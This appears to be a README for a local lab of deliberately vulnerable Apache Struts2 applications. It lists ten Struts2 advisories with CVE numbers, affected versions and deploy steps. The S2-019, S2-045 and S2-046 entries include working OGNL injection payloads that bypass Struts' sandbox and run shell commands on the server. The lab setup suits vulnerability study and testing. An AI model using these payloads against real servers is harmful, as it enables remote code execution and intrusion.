Requires Java 1.8+ and Maven 3.x+
1.下载 git clone https://git.oschina.net/0d/Struts2_bugs.git
2.查看远程分支 git branch -a
3.切换到分支 git checkout 分支名 如git checkout S2-046
4.打包 mvn clean package
5.部署在Tomcat中 将\target中生成的Struts2-046.war复制到Tomcat下的webapps目录中,然后开启Tomcat 访问http://127.0.0.1:8080/Struts2-046/index.action
1.S2-005
CVE-2010-1870
影响版本:Struts 2.0.0 – Struts 2.1.8.1
官方公告:http://struts.apache.org/docs/s2-005.html
2.S2-009
CVE-2011-3923
影响版本:Struts 2.0.0 -Struts 2.3.1.1
官方公告:http://struts.apache.org/docs/s2-009.html
3.S2-013
CVE-2013-1966
影响版本:Struts 2.0.0 – Struts 2.3.14
官方公告:http://struts.apache.org/docs/s2-013.html
4.S2-016
CVE-2013-2251
影响版本:Struts 2.0.0 – Struts 2.3.15
官方公告:http://struts.apache.org/docs/s2-016.html
5.S2-019
CVE-2013-4316
影响版本:Struts 2.0.0 – Struts 2.3.15.1
官方公告:http://struts.apache.org/docs/s2-019.html
POC: http://127.0.0.1:8080/Struts2-019/index.action?debug=command&expression=%23f=%23_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),%23f.setAccessible(true),%23f.set(%23_memberAccess,true),%23req=@org.apache.struts2.ServletActionContext@getRequest(),%23resp=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23a=(new java.lang.ProcessBuilder(new java.lang.String[]{'whoami'})).start(),%23b=%23a.getInputStream(),%23c=new java.io.InputStreamReader(%23b),%23d=new java.io.BufferedReader(%23c),%23e=new char[1000],%23d.read(%23e),%23resp.println(%23e),%23resp.close()
6.S2-020
CVE-2014-0094
影响版本:Struts 2.0.0 – Struts 2.3.16
官方公告:http://struts.apache.org/docs/s2-020.html
POC:暂无
7.S2-032
CVE-2016-3081
影响版本:Struts 2.3.18 – Struts 2.3.28
官方公告:http://struts.apache.org/docs/s2-032.html
8.S2-037
CVE-2016-4438
影响版本:Struts 2.3.20 - Struts 2.3.28.1
官方公告:http://struts.apache.org/docs/s2-037.html
9.S2-045
CVE-2017-5638
影响版本:Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10
官方公告:
http://struts.apache.org/docs/s2-045.html
https://cwiki.apache.org/confluence/display/WW/S2-045
POC:
POST /Struts2-045/index.action HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
Content-Length: 2
10.S2-046
CVE-2017-5638
影响版本:Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10
官方公告:
http://struts.apache.org/docs/s2-046.html
https://cwiki.apache.org/confluence/display/WW/S2-046
POC:
POST /Struts2-046/index.action HTTP/1.1
Host: 127.0.0.1:8080
Accept: /
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXd004BVJN9pBYBL2
Connection: close
Content-Length: 8850000
------WebKitFormBoundaryXd004BVJN9pBYBL2 Content-Disposition: form-data; name="foo"; filename="%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
Content-Type: text/plain
foo
------WebKitFormBoundaryXd004BVJN9pBYBL2--